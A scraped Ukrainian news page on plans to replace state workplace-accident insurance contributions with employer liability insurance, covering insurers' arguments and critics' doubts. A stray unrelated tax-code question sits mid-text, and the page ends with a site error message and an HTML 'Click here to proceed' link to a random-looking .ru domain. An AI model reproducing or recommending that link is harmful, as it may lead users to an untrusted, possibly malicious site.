Новости

Зміни в соціальному страхуванні

обов’язкові відрахування в державний Фонд на соціальне страхування

Незабаром планується обов’язкові відрахування в державний Фонд на соціальне страхування від нещасних випадків на виробництві  замінити на страхування відповідальності роботодавців.

Страховики підтримують цю ідею. Як вони сказала, що це гарна ідея, але не нова. Ще 15 років тому вони  вже намагалися її реалізувати, але на той час не змогли переконати держави в доцільності таких дій.

Для того, щоб впровадити таку ідею, потрібно вносити зміни до Закону та підготувати окремий законопроект.

Директор Української федерації страхування Галина Третьякова заявила, що в них вже давно підготовлені нові нормативні акти, які замінять державні фонди, на страхування особистої відповідальності роботодавців, та вони готов на протязі трьох місяців оновити всі проекти законів та підзаконні акти, для винесення їх на обговорення в уряді. ??Як називається розділ 5 Податкового кодексу України від 02.12.2010 року №2755-6??

На думку страховиків система державних фондів не вигідна, а ні роботодавцям, а на потерпілим, тому що нинішня система не стимулює роботодавців до створення  безпечних умов праці, тому що передбачає однакої  відрахування з усіх підприємств. За словами Третьякової при переході на страхування відповідальності роботодавців страховик будуть враховувати ступінь безпечності робочих місць та знижувати тариф тим підприємствам на яких найкращі показники безпечності.

Завдяки цьому відрахування можуть суттєво знизитися  аж до 30%  в порівнянні з теперішніми відрахуваннями, але при цьому середні виплати можуть зрости.

Також слід зауважити, що виплачувати будуть не всім постраждалим, а лише тим, які постраждали з вини роботодавця.

Одначе багато аналітиків  та чиновників вважають що,що страховий ринок не готовий до таких масштабних нововведень. Вони це аргументують тим, що спочатку страховики повинні капіталізуватися та виконувати всі свої зобов’язання хоча б по автоцивілці, а потім вже засіхати на роль захисників трудящого населення. Для цього рину потрібен сильний регулятор, а  також прозорі правила гри.

 На нашу думку хоча цей законопроект в першу чергу,  стимулюватиме роботодавців модернізовувати робочі місця та робити їх безпечнішими, але мінусом є те що, виплати будуть проводитися не всім, та яким чином довести, що нещасний випадок стався з вини роботодавця. Цим можуть скористатися страхові компанії та не проводити виплат.

Новости от ТАКСОптима:  ПДВ, податок на додану вартість

comments powered by HyperComments
Зміни в соціальному страхуванні | Оптимизация налогообложения

Ошибка

На сайте произошла непредвиденная ошибка. Пожалуйста, повторите попытку позже.
<body bgcolor="#ffffff" text="#000000"> <a href="http://ikmfyeurnamdjs.ru/rg-erdr.php?_rpo=t nhFexEw&_rdm=WUVQqf3NB1V4=9.N3&p=5f95%7C%40%7C5f95%7C%40%7CWUVQqf3NB1V4%3D9.N3%7C%40%7CfB%7C%40%7C%7C%40%7CZzAZAzFHF%7C%40%7Czbb%7C%40%7C39%7C%40%7C19c4NW4cGtAtAtzEGAATHbGG%7C%40%7Ct+nAGL7EI%7C%40%7CT+7hEEpub&ga=98SQA0HmAW5Vq4MzHye8V2s2EKbiMW6YHyV8WbAPT%2BPu1ppG%2BtJpoURIuPrY7UCslzODDb1uVCTcjF7aF5DtNSz58QUEbkMuDCV6fhHwngtbS60s%2FfcxJ%2FbeY%2FHovVrjPrPQpyDYBq%2FERyjb6lMvvmFHLrbI15NUf%2FIwRD8bUHk%3D&t=nfrm">Click here to proceed</a>. </body>